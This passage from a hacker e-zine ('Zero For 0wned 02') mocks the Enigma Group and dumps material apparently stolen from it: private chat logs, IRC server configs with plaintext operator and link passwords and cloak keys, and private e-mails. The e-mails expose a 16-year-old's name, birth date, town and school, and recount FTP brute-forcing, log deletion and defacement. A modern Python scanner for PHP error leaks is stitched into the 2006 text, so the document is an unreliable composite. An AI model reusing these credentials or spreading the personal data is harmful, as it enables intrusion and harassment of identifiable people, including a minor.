Zero For 0wned 02
sub TOC {
-[0x00]- Intro
-[0x01]- Enigma Group
-[0x02]- Critical Security
-[0x03]- Damn Small Linux
-[0x04]- Lordabot.c
-[0x05]- CF0
-[0x06]- Contact
}
sub Intro {
It's been a while since our last show, but no worries, we have not disappeared.
Rather, we are back with another issue of enjoyable entertainment.
If you find your name here, think no less of yourself, it could happen to anyone
(and just might). The best part about writing this issue was targeting those who
preach about security and swear by their own 'perfectly' secure servers. What's the
cause of you showing up in this issue? It's your own arrogance and stupidity that
put you here. Anyone can preach about security in theory, we've all seen that, but I
guess it's another thing to actually apply it. You probably ask yourself, "When?",
"Who?", "How?", well read on my and perhaps you'll find your answer, and perhaps you
will not. Who says we are nice people? Hah!
Enough with the talking and on with the show!
}
sub Enigmagroup {
These are just some morons who think they're all hard and leet.
They've even gone so far as to put "Enigmagroup: Learn from the best or be a
noob!" in their website banner. With this claim of theirs I decided to test
their security. After all, I shouldn't have been able to get anywhere, right?
First off we have some great AIM logs of the leader of Enigmagroup
psychomarine (his AIM nick is OSHIELDS2005), talking about how great they are:
[penguin]$ cat aim-log.txt
OSHIELDS2005: well trust me, anyone on this server, i guarentee you, can hold a
candle next to me, and my teams skills, so nothing will go down without them losing,
and they know it
OSHIELDS2005: cant* hold
OSHIELDS2005: besides, well be gone in like 2-3 days max
DOSshell2005: thats all fine and dandy, i just dont want a war started because i
decided to set this chan up u know
OSHIELDS2005: ha, war? between who?
OSHIELDS2005: ?
DOSshell2005: yall and hbh
OSHIELDS2005: ha we ARE at war
OSHIELDS2005: dont you notice they keep losing thier hosts?
OSHIELDS2005: ty ty, my fault
OSHIELDS2005: its amasing what a well drafted lawsuit letter will do to the hosts
OSHIELDS2005: next time they wont take credit for our missions
DOSshell2005: what fucking missions r u talking about
OSHIELDS2005: there was a time in the start of things, when we shared things, we
were allies
DOSshell2005: and wut happened after that
OSHIELDS2005: grindordie and mr cheese took our open source missions, from our staff
forum, and put them on thier site, first of all, almost all the basics, unless new
ones were recently added within the past 8 months, 3 reals, 2 steganos, 2
javascript, and the war games they have, which is why eg hasnt released our yet, so
we doint copy, or as it would seem
<snip>
Okay, enough of this, let's get to it.
[penguin]$ cat hashes.txt
Most of these people tend to reuse passwords:
[penguin]$ cat spider.txt
That's just a small portion.
Hmm, how about IRC configs?
[penguin]$ strings nick.db
[penguin]$ cat unrealircd.conf
loadmodule "src/modules/commands.so";
loadmodule "src/modules/cloak.so";
include "help.conf";
include "badwords.channel.conf";
include "badwords.message.conf";
include "badwords.quit.conf";
include "spamfilter.conf";
me
{
name "irc.enigmagroup.org";
info "Enigma Group Security IRC";
numeric 1;
};
admin {
"Christopher O'Shields";
"psychomarine";
"psychomarine@gmail.com";
};
class clients
{
pingfreq 90;
maxclients 500;
sendq 100000;
recvq 8000;
};
class servers
{
pingfreq 90;
maxclients 10; /* Max servers we can have linked at a time */
sendq 1000000;
connfreq 100; /* How many seconds between each connection attempt
*/
};
allow {
ip *@*;
hostname *@*;
class clients;
maxperip 5;
};
/* Passworded allow line */
allow {
ip *@255.255.255.255;
hostname *@*.enigmagroup.org;
class clients;
password "muahahaha";
maxperip 1;
};
allow channel {
channel "#WarezSucks";
};
oper psychomarine {
class clients;
password "muahahaha";
flags
{
can_zline;
can_gkline;
global;
};
};
oper strayfe {
class clients;
password "kcz7:%@fz}$qI0D";
flags
{
netadmin;
can_zline;
can_gzline;
can_gkline;
services-admin;
can_override;
};
};
oper switch {
class clients;
password "noobs";
flags
{
netadmin;
can_addline;
can_override
can_restart;
get_umodew
can_zline;
can_gzline
can_gkline;
services-admin;
};
};
listen *:6697
{
options
{
clientsonly;
};
};
listen *:8067;
listen *:10000;
listen *:6667;
link services.enigmagroup.org
{
username *;
hostname 127.0.0.1;
bind-ip *;
port 10000;
hub *;
password-connect "muahahaha";
password-receive "muahahaha";
class servers;
options {
};
};
ulines {
services.enigmagroup.org;
};
drpass {
restart "restart-now";
die "die-noob";
};
log "ircd.log" {
/* Delete the log file and start a new one when it reaches 2MB, leave this
out to always use the
same log */
maxsize 2097152;
flags {
oper;
kline;
connects;
server-connects;
kills;
errors;
sadmin-commands;
chg-commands;
oper-override;
spamfilter;
};
};
alias NickServ { type services; };
alias ChanServ { type services; };
alias OperServ { type services; };
alias HelpServ { type services; };
alias StatServ { type stats; };
alias "identify" {
format "^#" {
target "chanserv";
type services;
parameters "IDENTIFY %1-";
};
format "^[^#]" {
target "nickserv";
type services;
parameters "IDENTIFY %1-";
};
type command;
};
alias "services" {
format "^#" {
target "chanserv";
type services;
parameters "%1-";
};
format "^[^#]" {
target "nickserv";
type services;
parameters "%1-";
};
type command;
};
alias "identify" {
format "^#" {
target "chanserv";
type services;
parameters "IDENTIFY %1-";
};
format "^[^#]" {
target "nickserv";
type services;
parameters "IDENTIFY %1-";
};
type command;
};
alias "glinebot" {
format ".+" {
command "gline";
type real;
parameters "%1 2d Bots are not allowed on this server, please read
the faq at http://www.example.com/faq/123";
};
type command;
};
ban nick {
mask "*C*h*a*n*S*e*r*v*";
reason "Reserved for Services";
};
ban ip {
mask 195.86.232.81;
reason "Delinked server";
};
ban server {
mask eris.berkeley.edu;
reason "Get out of here.";
};
ban user {
mask *tirc@*.saturn.bbn.com;
reason "Idiot";
};
ban realname {
mask "Swat Team";
reason "mIRKFORCE";
};
ban realname {
mask "sub7server";
reason "sub7";
};
except ban {
/* don't ban stskeeps */
mask *stskeeps@212.*;
};
deny dcc {
filename "*sub7*";
reason "Possible Sub7 Virus";
};
deny channel {
channel "*warez*";
reason "Warez is illegal";
};
vhost {
vhost i.hate.microsefrs.com;
from {
userhost *@*.image.dk;
};
login stskeeps;
password moo1cowsrulemyworld;
};
set {
network-name "EnigmaGroup";
default-server "irc.enigmagroup.org";
services-server "services.enigmagroup.org";
stats-server "stats.enigmagroup.org";
help-channel "#help";
hiddenhost-prefix "Enigma";
cloak-keys {
"aoAr1HnR6gl3sJ7hVz4Zcvnbmnb7x4YwpW";
"aoAr5yr1HnR6gl3sJ7hvbnVz4Zb7x4YwpW";
"aoAr1HnR6gl3frtghjsJ7vbmhVz4Zb7x4YwpW";
};
hosts {
local "locop.enigmagroup.org";
global "ircop.enigmagroup.org";
coadmin "coadmin.enigmagroup.org";
admin "admin.enigmagroup.org";
servicesadmin "csops.enigmagroup.org";
netadmin "netadmin.enigmagroup.org";
host-on-oper-up "no";
};
};
set {
kline-address "psychomarine@gmail.com";
modes-on-connect "+ixw";
modes-on-oper "+xw";
oper-auto-join "#opers";
dns {
nameserver 127.0.0.1;
timeout 2s;
retries 2;
};
options {
hide-ulines;
/* You can enable ident checking here if you want */
/* identd-check; */
show-connect-info;
};
maxchannelsperuser 10;
oper-only-stats "okfGsMRUEelLCXzdD";
/* Throttling: this example sets a limit of 3 connection attempts per 60s
(per host). */
throttle {
connections 3;
period 60s;
};
/* Anti flood protection */
anti-flood {
nick-flood 3:60; /* 3 nickchanges per 60 seconds (the
default) */
};
/* Spam filter */
spamfilter {
ban-time 1d; /* default duration of a *line ban set by spamfilter */
ban-reason "Spam/Advertising"; /* default reason */
virus-help-channel "#help"; /* channel to use for 'viruschan' action
*/
/* except "#help"; channel to exempt from filtering */
};
};
[penguin]$ cat services.conf
RemoteServer 127.0.0.1 10000 "muahahaha"
ServerName "services.enigmagroup.org"
ServerDesc "Services for EG Networks"
ServiceUser "services@enigmagroup.org"
NickServName "NickServ" "Nickname Server"
ChanServName "ChanServ" "Channel Server"
MemoServName "MemoServ" "Memo Server"
BotServName "BotServ" "Bot Server"
HelpServName "HelpServ" "Help Server"
OperServName "OperServ" "Operator Server"
GlobalName "Global" "Global Noticer"
HostServName "HostServ" "vHost Server"
PIDFile services.pid
MOTDFile services.motd
NickServDB nick.db
ChanServDB chan.db
BotServDB bot.db
OperServDB oper.db
NewsDB news.db
ExceptionDB exception.db
HostServDB hosts.db
HelpChannel "#help"
NetworkDomain "irc.enigmagroup.org"
NetworkName "EG IRC"
StrictPasswords
BadPassLimit 5
BadPassTimeout 1h
UpdateTimeout 5m
ExpireTimeout 30m
ReadTimeout 5s
WarningTimeout 4h
TimeoutCheck 3s
KeepLogs 7
KeepBackups 3
ForceForbidReason
UsePrivmsg
GlobalOnCycleMessage "Services are restarting, they will be back shortly - please be
good while we're gone"
GlobalOnCycleUP "Services are now back online - have a nice day"
ProxyThreads 5
ProxyMessage1 "I will now detect if you're using an insecure proxy."
ProxyMessage2 "If you see a connection on port 23, 1080, 3128 or 8080 from"
ProxyMessage3 "my.box.net, please disregard it, as it is the detector in action."
ProxyMessage4 "See http://proxy.myirc.net/ for information about our proxy policy."
ProxyCheckWingate
ProxyCheckSocks4
ProxyCheckSocks5
ProxyCheckHTTP1
ProxyCheckHTTP2
ProxyCheckHTTP3
ProxyTimeout 15s
ProxyTestServer "1.2.3.4" 6667
ProxyExpire 30d
ProxyCacheExpire 1d
ProxyAkillReason "You're using an insecure proxy."
WallProxy
ProxyMax 50
NSDefSecure
NSDefPrivate
NSDefHideEmail
NSDefHideUsermask
NSDefMemoSignon
NSDefMemoReceive
NSDefLanguage 1
NSRegDelay 30s
NSExpire 21d
NSMaxAliases 32
NSAccessMax 32
NSEnforcerUser enforcer@enigmagroup.org
NSReleaseTimeout 1m
NSListMax 50
NSGuestNickPrefix "n00b"
NSSecureAdmins
NSStrictPrivileges
NSRestrictGetPass
CSDefKeepTopic
CSDefPeace
CSDefSecure
CSDefSecureFounder
CSDefSignKick
CSDefXOP
CSMaxReg 20
CSExpire 14d
CSDefBantype 2
CSAccessMax 1024
CSAutokickMax 32
CSAutokickReason "User has been banned from the channel"
CSInhabit 15s
CSListMax 50
MSMaxMemos 20
MSSendDelay 3s
MSNotifyAll
BSDefGreet
BSDefFantasy
BSDefSymbiosis
BSMinUsers 1
BSBadWordsMax 32
BSKeepData 10m
BSGentleBWReason
ServicesRoot "psychomarine"
LogMaxUsers
AutoKillExpiry 30d
ChanKillExpiry 30d
SGLineExpiry 30d
SQLineExpiry 30d
SZLineExpiry 30d
KillClonesAkillExpire 30m
DisableRaw off
WallOSGlobal
WallOSMode
WallOSClearmodes
WallOSKick
WallOSAkill
WallOSSGLine
WallOSSQLine
WallOSSZLine
WallOSNoOp
WallOSJupe
WallOSRaw
WallGetpass
WallSetpass
WallForbid
WallDrop
LimitSessions
DefSessionLimit 3
MaxSessionLimit 100
ExceptionExpiry 1d
SessionLimitExceeded "The session limit for your host %s has been exceeded."
MaxSessionKill 15
SessionAutoKillExpiry 30m
AddAkiller
[penguin]$ cat phate.txt
Phate is a prominent member of Enigmagroup. He's a forum moderator, as well as
an op in their IRC channel.
We did some digging on him. Let's see what was turned up:
He appears to be a fan of password re-use. How fun. :)
Phate also appears to be a bit of a whitehat:
[penguin]$ cat busted.txt
X-Gmail-Received: ee56309b55a2363dd20870515cf6e5754cbf73ce
Delivered-To: charade000@gmail.com
Received: by 10.70.63.17 with SMTP id l17cs90277wxa;
Wed, 9 Aug 2006 22:47:51 -0700 (PDT)
Received: by 10.35.77.1 with SMTP id e1mr3109061pyl;
Wed, 09 Aug 2006 22:47:51 -0700 (PDT)
Return-Path: <admin@milliondollarfreeload.com>
Received: from milliondollarfreeload.com (mail.alphared.com [38.113.128.17])
by mx.gmail.com with ESMTP id 38si1699269nzk.2006.08.09.22.47.51;
Wed, 09 Aug 2006 22:47:51 -0700 (PDT)
Received-SPF: neutral (gmail.com: 38.113.128.17 is neither permitted nor denied by
best guess record for domain of admin@milliondollarfreeload.com)
Date: Thu, 10 Aug 2006 00:47:47 -0500
Message-Id: <200608100047.AA427098378@milliondollarfreeload.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
From: "admin " <admin@milliondollarfreeload.com>
Reply-To: <admin@milliondollarfreeload.com>
To: <charade000@gmail.com>
Subject: Computer intrusion WARNING: www.milliondollarfreeload.com
X-Mailer: <IMail v8.05>
To Saeed,
This is our first and final warning in regards to your recent intrusion to our
website www.milliondollarfreeload.com. Our record indicates that you have hacked
into our server once and had over 300 attempts in hacking our email system. We
would like to inform you that hacking is a federal crime.
We ran a simple search of you and this is some of the information that turned out:
Male
16 years old
August 08, 1989
Corona, CALIFORNIA
United States
Santiago High School
Norco,California
As mentioned above, this is a final warning. If any type of these activities
continues, we will report you to the authority
(http://www.usdoj.gov/criminal/cybercrime/reporting.htm) and pursue for all of the
damages you may have caused. We ask you to kindly stop here because a criminal
record may hurt your future career.
--Admin
www.milliondollarfreeload.com
X-Gmail-Received: bc0d3fc0112e4ea4d0db1b7e59bec1b46e0674f5
Received: by 10.70.63.17 with HTTP; Thu, 10 Aug 2006 07:52:05 -0700 (PDT)
Message-ID: <42cb2150608100752x3d81712chc352904630af012c@mail.gmail.com>
Date: Thu, 10 Aug 2006 07:52:05 -0700
From: Charade <charade000@gmail.com>
To: admin@milliondollarfreeload.com
Subject: Re: Computer intrusion WARNING: www.milliondollarfreeload.com
In-Reply-To: <200608100047.AA427098378@milliondollarfreeload.com>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_Part_39129_24992824.1155221525852"
References: <200608100047.AA427098378@milliondollarfreeload.com>
Delivered-To: charade000@gmail.com
------=_Part_39129_24992824.1155221525852
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Dear Tillie,
First of all i would like to make it clear that i never gained root to the
server, nor had 300 attempts to penetrate your email system, I gained access
through your FTP port which was vulnerable to Brutus because of the weak
password. And as for the search, Im not impressed, you have me on your
myspace and could have *easily* got the information from there, and i could
do the same.
I'd also like to inform you that when i did have root( in the FTP that
is), I had the oppurtunity to cause catastrophic damage, I could have easily
accessed the bank accounts of your members, and yours as well, You should be
thanking me that my ethics were against this, and in replacement the only
damage i did was deleting the logs, and replacing the index.html
I wont pursue damage to hack your site, so you can be rest assured on
this. But, i am offering my services to assist you in securing your website,
because I can at the moment deface it again, through many other ways
including an SQL Injection.
in Conclusion, show me the logs , or any kind of proof that indicate i
hacked your server. I am offering my allegiance to HELPING you.
Dont refuse.
On 8/9/06, admin <admin@milliondollarfreeload.com> wrote:
>
> To Saeed,
>
> This is our first and final warning in regards to your recent intrusion to
> our website www.milliondollarfreeload.com. Our record indicates that you
> have hacked into our server once and had over 300 attempts in hacking our
> email system. We would like to inform you that hacking is a federal crime.
>
> We ran a simple search of you and this is some of the information that
> turned out:
>
> Male
> 16 years old
> August 08, 1989
> Corona, CALIFORNIA
> United States
>
> Santiago High School
> Norco,California
>
> As mentioned above, this is a final warning. If any type of these
> activities continues, we will report you to the authority (
> http://www.usdoj.gov/criminal/cybercrime/reporting.htm) and pursue for all
> of the damages you may have caused. We ask you to kindly stop here because
> a criminal record may hurt your future career.
>
> --Admin
> www.milliondollarfreeload.com
>
>
------=_Part_39129_24992824.1155221525852--
X-Gmail-Received: 3788a4a66a447a8f0ceaffd8de0bc038a90cfee2
Delivered-To: charade000@gmail.com
Received: by 10.70.63.17 with SMTP id l17cs112798wxa;
Thu, 10 Aug 2006 09:10:56 -0700 (PDT)
Received: by 10.67.101.8 with SMTP id d8mr2786610ugm;
Thu, 10 Aug 2006 09:10:56 -0700 (PDT)
Received: by 10.66.221.8 with HTTP; Thu, 10 Aug 2006 09:10:56 -0700 (PDT)
Message-ID: <9efd8e010608100910v3cc997c3s80323ffbd9dd02c9@mail.gmail.com>
Date: Thu, 10 Aug 2006 09:10:56 -0700
From: "JA Synergy" <jasynergy@gmail.com>
To: Charade <charade000@gmail.com>
Subject: Re: Reply to cease and descist
In-Reply-To: <42cb2150608100754r5a510412q247e3a7883ac4c6@mail.gmail.com>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_Part_72593_6397638.1155226256172"
References: <42cb2150608100754r5a510412q247e3a7883ac4c6@mail.gmail.com>
------=_Part_72593_6397638.1155226256172
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Hello Saeed,
Please explain what you can do to secure the site. Are you helping as a
hobby or as a job? Let's say if we are not looking in hiring, are you going
to continue hacking us?
Andrew
On 8/10/06, Charade <charade000@gmail.com> wrote:
>
> Dear Tillie,
>
> First of all I would like to make it clear that I never gained root to the
> server, nor had 300 attempts to penetrate your email system. I gained access
> through your FTP port which was vulnerable to Brutus because of the weak
> password. And as for the search, I'm not impressed, you have me on your
> myspace and could have *easily* got the information from there, and I could
> do the same.
>
>
> I'd also like to inform you that when I did have root (in the FTP that
> is), I had the opportunity to cause catastrophic damage. I could have easily
> accessed the bank accounts of your members, and yours as well. You should be
> thanking me that my ethics were against this, and in replacement the only
> damage I did was deleting the logs, and replacing the index.html
>
> I won't pursue damage to hack your site, so you can rest assured on
> this. But, I am offering my services to assist you in securing your website,
> because I can at the moment deface it again, through many other ways
> including an SQL Injection.
>
> In conclusion, show me the logs, or any kind of proof that indicates I
> hacked your server. I am offering my allegiance to HELPING you.
>
> Don't refuse.
>
------=_Part_72593_6397638.1155226256172--
X-Gmail-Received: cac8c250dea915e5c0b1ab660242c1afbd5b3884
Received: by 10.70.63.17 with HTTP; Thu, 10 Aug 2006 11:17:08 -0700 (PDT)
Message-ID: <42cb2150608101117s200efb08p90299900fa1c8af8@mail.gmail.com>
Date: Thu, 10 Aug 2006 11:17:08 -0700
From: Charade <charade000@gmail.com>
To: "JA Synergy" <jasynergy@gmail.com>
Subject: Re: Reply to cease and descist
In-Reply-To: <9efd8e010608100910v3cc997c3s80323ffbd9dd02c9@mail.gmail.com>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_Part_41818_313195.1155233828751"
References: <42cb2150608100754r5a510412q247e3a7883ac4c6@mail.gmail.com>
<9efd8e010608100910v3cc997c3s80323ffbd9dd02c9@mail.gmail.com>
Delivered-To: charade000@gmail.com
------=_Part_41818_313195.1155233828751
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Of course I wouldn't do it as a job, I'm doing this out of kindness to help
you. I'm a hacker not a criminal. I don't have time to sit here and do
Penetration tests on your server, but I will point out certain things.
But, if you needed someone to hire to administrate your servers, or a
"consultant" to spend his day running tests I'm more than happy, and you know
where to find me.
First of all, you have tons of directories vulnerable to cross site
scripting
especially in the display_map.php
and demo/sendurl.php
-clean up the coding on the /admin.php
Fatal error: Call to undefined function: gettext() in
/home/jaenergy/public_html/admin.php on line 26
That's how I was able to find out your user name was jaenergy.
And if I spent more time I'm sure I can find more..
Just curious though because I thought the admin of the website was a girl
http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=86281236
is saying that is her website.
And that she coded it herself, which is a lie because I noticed it used
pagekits.
And btw, can you send me the proof that shows me I was in the server
Just curious.
On 8/10/06, JA Synergy <jasynergy@gmail.com> wrote:
>
> Hello Saeed,
>
> Please explain what you can do to secure the site. Are you helping as a
> hobby or as a job? Let's say if we are not looking in hiring, are you going
> to continue hacking us?
>
> Andrew
>
> On 8/10/06, Charade <charade000@gmail.com> wrote:
> >
> > Dear Tillie,
> >
> > First of all I would like to make it clear that I never gained root to
> > the server, nor had 300 attempts to penetrate your email system. I gained
> > access through your FTP port which was vulnerable to Brutus because of the
> > weak password. And as for the search, I'm not impressed, you have me on your
> > myspace and could have *easily* got the information from there, and I could
> > do the same.
> >
> >
> > I'd also like to inform you that when I did have root (in the FTP
> > that is), I had the opportunity to cause catastrophic damage. I could have
> > easily accessed the bank accounts of your members, and yours as well. You
> > should be thanking me that my ethics were against this, and in replacement
> > the only damage I did was deleting the logs, and replacing the
> > index.html
> >
> > I won't pursue damage to hack your site, so you can rest assured on
> > this. But, I am offering my services to assist you in securing your website,
> > because I can at the moment deface it again, through many other ways
> > including an SQL Injection.
> >
> > In conclusion, show me the logs, or any kind of proof that indicates I
> > hacked your server. I am offering my allegiance to HELPING you.
> >
> > Don't refuse.
> >
>
>
------=_Part_41818_313195.1155233828751--
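The path disclosure described in the message above (a PHP fatal error printed into the page, exposing /home/jaenergy/public_html/admin.php and with it the account name) can be checked for from the site owner's side. This is an added example, not part of the original e-mails: it scans response bodies you already hold for PHP error output and reports the leaked path and home-directory account. The function names, the `example.test` URLs and the sample bodies are constructed for illustration; the server-side fix is `display_errors = Off` with `log_errors = On` in php.ini.

```python
import html
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# PHP writes errors into the page as
#   <b>Fatal error</b>: message in <b>/abs/path/file.php</b> on line <b>26</b>
# or as the same text without tags when html_errors is off.
_TAG = re.compile(r"<[^>]+>")
_PHP_ERROR = re.compile(
    r"\b(?P<level>Fatal error|Parse error|Warning|Notice)\s*:\s*"
    r"(?P<message>.{1,300}?)\s+in\s+(?P<path>(?:/|[A-Za-z]:\\)\S+)"
    r"\s+on\s+line\s+(?P<line>\d+)"
)
# On shared hosting the site usually lives under the account's home
# directory, so the component after /home/ is the login name.
_HOME_ACCOUNT = re.compile(r"^/home/([^/]+)/")


@dataclass(frozen=True)
class Leak:
    level: str
    message: str
    path: str
    line: int
    account: Optional[str]  # None when the path is not under /home/<user>/


def _visible_text(body: str) -> str:
    """Strip tags, decode entities and collapse whitespace to single spaces."""
    text = html.unescape(_TAG.sub(" ", body))
    return re.sub(r"\s+", " ", text).strip()


def find_php_error_leaks(body: str) -> List[Leak]:
    """Return every PHP error in a response body that exposes a file path."""
    leaks = []
    for m in _PHP_ERROR.finditer(_visible_text(body)):
        account = _HOME_ACCOUNT.match(m.group("path"))
        leaks.append(
            Leak(
                level=m.group("level"),
                message=m.group("message"),
                path=m.group("path"),
                line=int(m.group("line")),
                account=account.group(1) if account else None,
            )
        )
    return leaks


def audit_responses(responses: Dict[str, str]) -> Dict[str, List[Leak]]:
    """Map each URL whose body leaks a path to the leaks found in it."""
    report = {}
    for url, body in responses.items():
        leaks = find_php_error_leaks(body)
        if leaks:
            report[url] = leaks
    return report


# Constructed sample bodies. The first reproduces the error quoted in the
# e-mail; the second is a plain-text warning outside /home; the third is
# an ordinary page that merely contains the word "Warning".
SAMPLE_RESPONSES = {
    "http://example.test/admin.php": (
        "<html><body><br />\n<b>Fatal error</b>:  Call to undefined function:"
        "  gettext() in <b>/home/jaenergy/public_html/admin.php</b>"
        " on line <b>26</b><br />\n</body></html>"
    ),
    "http://example.test/index.php": (
        "<html><body>Warning: include(config.inc): failed to open stream: "
        "No such file or directory in /var/www/html/index.php on line 3\n"
        "<h1>Welcome</h1></body></html>"
    ),
    "http://example.test/faq.html": (
        "<html><body><p>Warning: prices may change.</p></body></html>"
    ),
}

if __name__ == "__main__":
    for url, leaks in audit_responses(SAMPLE_RESPONSES).items():
        for leak in leaks:
            print(url, leak.level, leak.path, leak.line, leak.account)
```

Paths containing spaces are not matched by this pattern; treat a clean result as a lower bound, not proof that error display is off.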
X-Gmail-Received: a2aa0aa254676fa864fbb0a0cdc06bd89b294f1a
Delivered-To: charade000@gmail.com
Received: by 10.70.63.17 with SMTP id l17cs123829wxa;
Thu, 10 Aug 2006 14:02:35 -0700 (PDT)
Received: by 10.67.101.8 with SMTP id d8mr3188560ugm;
Thu, 10 Aug 2006 14:02:34 -0700 (PDT)
Received: by 10.66.221.8 with HTTP; Thu, 10 Aug 2006 14:02:34 -0700 (PDT)
Message-ID: <9efd8e010608101402q1209b1dcqd6853ace2a7a61cd@mail.gmail.com>
Date: Thu, 10 Aug 2006 16:02:34 -0500
From: "JA Synergy" <jasynergy@gmail.com>
To: Charade <charade000@gmail.com>
Subject: Re: Reply to cease and descist
In-Reply-To: <42cb2150608101117s200efb08p90299900fa1c8af8@mail.gmail.com>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_Part_79711_29087486.1155243754397"
References: <42cb2150608100754r5a510412q247e3a7883ac4c6@mail.gmail.com>
<9efd8e010608100910v3cc997c3s80323ffbd9dd02c9@mail.gmail.com>
<42cb2150608101117s200efb08p90299900fa1c8af8@mail.gmail.com>
------=_Part_79711_29087486.1155243754397
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Thanks for your help. I will try to fix the problems that you suggest. I
will contact my server admin for the log.
On 8/10/06, Charade <charade000@gmail.com> wrote:
>
> Of course I wouldn't do it as a job, I'm doing this out of kindness to help
> you. I'm a hacker not a criminal. I don't have time to sit here and do
> Penetration tests on your server, but I will point out certain things.
>
> But, if you needed someone to hire to administrate your servers, or a
> "consultant" to spend his day running tests I'm more than happy, and you know
> where to find me.
>
> First of all, you have tons of directories vulnerable to cross site
> scripting
> especially in the display_map.php
> and demo/sendurl.php
>
> -clean up the coding on the /admin.php
> Fatal error: Call to undefined function: gettext() in
> /home/jaenergy/public_html/admin.php on line 26
> That's how I was able to find out your user name was jaenergy.
>
> And if I spent more time I'm sure I can find more..
>
> Just curious though because I thought the admin of the website was a girl
>
> http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=86281236
> is saying that is her website.
> And that she coded it herself, which is a lie because I noticed it used
> pagekits.
>
> And btw, can you send me the proof that shows me I was in the server
> Just curious.
>
>
>
> On 8/10/06, JA Synergy <jasynergy@gmail.com> wrote:
> >
> > Hello Saeed,
> >
> > Please explain what you can do to secure the site. Are you helping as a
> > hobby or as a job? Let's say if we are not looking in hiring, are you going
> > to continue hacking us?
> >
> > Andrew
> >
> > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > >
> > > Dear Tillie,
> > >
> > > First of all I would like to make it clear that I never gained root to
> > > the server, nor had 300 attempts to penetrate your email system. I gained
> > > access through your FTP port which was vulnerable to Brutus because of the
> > > weak password. And as for the search, I'm not impressed, you have me on your
> > > myspace and could have *easily* got the information from there, and I could
> > > do the same.
> > >
> > >
> > > I'd also like to inform you that when I did have root (in the FTP
> > > that is), I had the opportunity to cause catastrophic damage. I could have
> > > easily accessed the bank accounts of your members, and yours as well. You
> > > should be thanking me that my ethics were against this, and in replacement
> > > the only damage I did was deleting the logs, and replacing the
> > > index.html
> > >
> > > I won't pursue damage to hack your site, so you can rest assured
> > > on this. But, I am offering my services to assist you in securing your
> > > website, because I can at the moment deface it again, through many other
> > > ways including an SQL Injection.
> > >
> > > In conclusion, show me the logs, or any kind of proof that indicates
> > > I hacked your server. I am offering my allegiance to HELPING you.
> > >
> > > Don't refuse.
> > >
> >
> >
>
------=_Part_79711_29087486.1155243754397--
X-Gmail-Received: fa6838bd55c73ee47325cfd4f90cbd80b012a0dc
Received: by 10.70.63.17 with HTTP; Thu, 10 Aug 2006 14:24:48 -0700 (PDT)
Message-ID: <42cb2150608101424k718fa5e6q7b5b45cbd104c891@mail.gmail.com>
Date: Thu, 10 Aug 2006 14:24:48 -0700
From: Charade <charade000@gmail.com>
To: "JA Synergy" <jasynergy@gmail.com>
Subject: Re: Reply to cease and descist
In-Reply-To: <9efd8e010608101402q1209b1dcqd6853ace2a7a61cd@mail.gmail.com>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_Part_44066_13773717.1155245088400"
References: <42cb2150608100754r5a510412q247e3a7883ac4c6@mail.gmail.com>
<9efd8e010608100910v3cc997c3s80323ffbd9dd02c9@mail.gmail.com>
<42cb2150608101117s200efb08p90299900fa1c8af8@mail.gmail.com>
<9efd8e010608101402q1209b1dcqd6853ace2a7a61cd@mail.gmail.com>
Delivered-To: charade000@gmail.com
------=_Part_44066_13773717.1155245088400
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Thanks, appreciate it.
On 8/10/06, JA Synergy <jasynergy@gmail.com> wrote:
>
> Thanks for your help. I will try to fix the problems that you suggest. I
> will contact my server admin for the log.
>
>
> On 8/10/06, Charade <charade000@gmail.com> wrote:
> >
> > Of course I wouldn't do it as a job, I'm doing this out of kindness to
> > help you. I'm a hacker not a criminal. I don't have time to sit here and do
> > Penetration tests on your server, but I will point out certain things.
> >
> > But, if you needed someone to hire to administrate your servers, or a
> > "consultant" to spend his day running tests I'm more than happy, and you know
> > where to find me.
> >
> > First of all, you have tons of directories vulnerable to cross site
> > scripting
> > especially in the display_map.php
> > and demo/sendurl.php
> >
> > -clean up the coding on the /admin.php
> > Fatal error: Call to undefined function: gettext() in
> > /home/jaenergy/public_html/admin.php on line 26
> > That's how I was able to find out your user name was jaenergy.
> >
> > And if I spent more time I'm sure I can find more..
> >
> > Just curious though because I thought the admin of the website was a
> > girl
> >
> > http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=86281236
> >
> > is saying that is her website.
> > And that she coded it herself, which is a lie because I noticed it used
> > pagekits.
> >
> > And btw, can you send me the proof that shows me I was in the server
> > Just curious.
> >
> >
> >
> > On 8/10/06, JA Synergy <jasynergy@gmail.com > wrote:
> > >
> > > Hello Saeed,
> > >
> > > Please explain what you can do to secure the site. Are you helping as
> > > a hobby or as a job? Let's say if we are not looking in hiring, are you
> > > going to continue hacking us?
> > >
> > > Andrew
> > >
> > > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > > >
> > > > Dear Tillie,
> > > >
> > > > First of all I would like to make it clear that I never gained root
> > > > to the server, nor had 300 attempts to penetrate your email system. I gained
> > > > access through your FTP port which was vulnerable to Brutus because of the
> > > > weak password. And as for the search, I'm not impressed, you have me on your
> > > > myspace and could have *easily* got the information from there, and I could
> > > > do the same.
> > > >
> > > >
> > > > I'd also like to inform you that when I did have root (in the FTP
> > > > that is), I had the opportunity to cause catastrophic damage. I could have
> > > > easily accessed the bank accounts of your members, and yours as well. You
> > > > should be thanking me that my ethics were against this, and in replacement
> > > > the only damage I did was deleting the logs, and replacing the
> > > > index.html
> > > >
> > > > I won't pursue damage to hack your site, so you can rest assured
> > > > on this. But, I am offering my services to assist you in securing your
> > > > website, because I can at the moment deface it again, through many other
